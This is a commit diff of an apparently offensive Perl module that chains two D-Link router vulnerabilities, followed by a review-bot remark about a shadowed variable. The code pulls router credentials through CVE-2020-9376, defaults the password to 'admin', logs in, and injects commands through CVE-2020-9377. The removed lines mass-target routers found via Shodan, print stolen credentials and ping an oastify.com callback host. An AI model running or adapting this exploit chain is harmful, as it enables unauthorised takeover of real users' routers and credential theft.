fixes and more flexibility
htrgouvea committed Jun 16, 2024
1 parent e3dad4d commit 3e654b0
Showing 1 changed file with 39 additions and 42 deletions.
81 changes: 39 additions & 42 deletions lib/Spellbook/Exploit/Fullchain_DLINK.pm
Expand Up @@ -4,66 +4,62 @@ package Spellbook::Exploit::Fullchain_DLINK {
use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;
use Spellbook::Recon::Shodan;
use Spellbook::Recon::Query_Shodan;
use Spellbook::Advisory::CVE_2020_9376;
use Spellbook::Advisory::CVE_2020_9377;

sub new {
my ($self, $parameters) = @_;
my ($help, $target, @results);
my ($help, $target, $payload, @results);

Getopt::Long::GetOptionsFromArray (
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
"h|help" => \$help,
"t|target=s" => \$target,
"p|payload=s" => \$payload
);

if ($target) {
my @targets = Spellbook::Recon::Shodan -> new (["--target" => 1]);

foreach my $router (@targets) {
my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $router]);
if ($target !~ /^http(s)?:\/\//x) {
$target = "http://$target";
}

if ($credentials) {
my ($username, $password) = split /:/, $credentials;
my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]);

if (!$password) { $password = "admin"; }
if ($credentials) {
my ($username, $password) = split /:/, $credentials;

if ($username) {
if ($router !~ /^http(s)?:\/\//x) {
$router = "http://$router";
}
if (!$password) {
$password = "admin";
}

my $userAgent = LWP::UserAgent->new();
my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
if ($username) {
my $userAgent = LWP::UserAgent->new();
my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";

my $headers = HTTP::Headers->new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=dLktm5OJdn",
"User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
"Accept" => "*/*",
"Accept-Language" => "en-US,en;q=0.5",
"Accept-Encoding" => "gzip, deflate",
"Origin" => "$router",
"Referer" => "$router/",
"Connection" => "keep-alive"
);
my $headers = HTTP::Headers->new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=zwUEueUOvi",
"User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", "Accept" => "*/*",
"Accept-Language" => "en-US,en;q=0.5",
"Accept-Encoding" => "gzip, deflate",
"Origin" => $target,
"Referer" => $target,
"Connection" => "keep-alive"
);

my $request = HTTP::Request -> new("POST", "$router/session.cgi", $headers, $payload);
my $response = $userAgent -> request($request);
my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload);
my $response = $userAgent -> request($request);

if ($response -> is_success) {
my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
"--target" => $router,
"--cookie" => "dLktm5OJdn",
"--payload" => "ping h4mm16zegmqhsuhuatu0j6ged5jw7nvc.oastify.com"
]);
if ($response -> is_success) {
my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
"--target" => $target,
"--cookie" => "zwUEueUOvi",
"--payload" => "uname -a"
]);

if ($exploit[0] ne "Authenication fail") {
print "$router => $username / $password / dLktm5OJdn\n";

push @results, @exploit;
}
if ($exploit[0] ne "Authenication fail") {
push @results, @exploit;
}
}
}
Expand All @@ -77,7 +73,8 @@ package Spellbook::Exploit::Fullchain_DLINK {
\rExploit::Fullchain_DLINK
\r=======================
\r-h, --help See this menu
\r-t, --target Define a target\n\n";
\r-t, --target Define a target
\r-p, --payload Send a command\n\n";
}

return 0;
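Review bot: The inner `my $payload = "REPORT_METHOD=xml&..."` in the `if ($username)` block reuses the name this commit declares for the new `-p|--payload` option, so the option's value is shadowed for the rest of that block and, in the lines shown, is never read after `GetOptionsFromArray` fills it. Renaming the form body, e.g. `my $login_body = ...;` with the matching argument in `HTTP::Request -> new(...)`, keeps the two apart; the help line added in the second hunk should then describe what the option actually does, or be dropped together with the option if the fixed command is intended. The session identifier is also written out twice, in the `Cookie` header and in the `--cookie` argument, and a single `my $session_id = "...";` would keep them in step. `sub new` continues between and after the two hunks, so a use of the option outside the visible lines cannot be ruled out.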